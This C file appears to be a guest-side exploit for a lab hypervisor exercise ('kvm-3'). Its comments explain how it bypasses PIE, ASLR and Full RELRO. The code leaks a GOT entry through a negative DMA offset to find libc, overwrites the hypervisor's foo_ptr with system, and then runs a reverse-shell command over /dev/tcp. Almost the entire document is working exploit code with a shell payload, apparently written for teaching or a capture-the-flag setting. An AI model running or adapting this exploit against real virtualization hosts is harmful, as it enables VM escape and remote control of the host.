extern void outb(unsigned short a, unsigned char b);
extern void outl(unsigned short a, unsigned int b);

/* This binary enables all protections, including PIE, ASLR and Full RELRO.
 * Note that we don't actually need to leak the executable base address,
 * since all accesses are relative to guestmem. We do need to leak the
 * libc base address, though, if we want to find some useful code to reuse.
 * The other binaries only allowed to reach memory at positive offsets less
 * than 4GiB after guestmem. Unfortunately, the GOT is located at addresses
 * below guestmem. To simplify the exploit, the kvm-3 binary allows the
 * guest to use signed addresses when starting a DMA operation, and this
 * allows us to leak data below the guestmem.
 *
 * Performing the same attack as in kvm-2 is also difficult. ASLR will move
 * gestmem much above 4GiB, and therefore we will not be able to use
 * the 'xchg eax, esp' gadget to pivot the hypervisor stack into the guest
 * memory.
 *
 * We resort to a much simpler, ad-hoc solution: we overwrite foo_ptr with
 * system and exploit the fact that we can directly control the argument
 * to *foo_ptr.
 */

unsigned long libc = 0;
unsigned long const system = 0x00000000000503c0;
unsigned long const errno = 0x0000000000029030;

unsigned long const guestmem = 0x7000;
unsigned long const foo_ptr = 0x1007000;
unsigned long const errno_got = 0x4f18;

void print(const char *s)
{
	while (*s != '\0') {
		outb(0x60, *s);
		s++;
	}
}

const char *cmd = "/bin/bash -c 'sh -i >& /dev/tcp/localhost/10000 <&1 &'";

int main()
{
	char buf[512];
	unsigned long errno_addr;

	// leak the GOT
	outl(0x40, 1);
	outl(0x44, errno_got - guestmem); /* negative value */
	outl(0x48, 2);
	outl(0x44, (unsigned long)buf);
	outl(0x48, 1);

	errno_addr = *(unsigned long *)&buf[0];
	libc = errno_addr - errno;

	// overwrite foo_ptr in the vmm with the the address of system
	*(unsigned long*)&buf[512-8] = libc + system;
	outl(0x40, 0);
	outl(0x44, (unsigned long)buf);
	outl(0x48, 2);
	outl(0x44, foo_ptr - guestmem - (512-8));
	outl(0x48, 1);

	// call system(cmd)
	outl(0x70, (unsigned long)cmd);
}
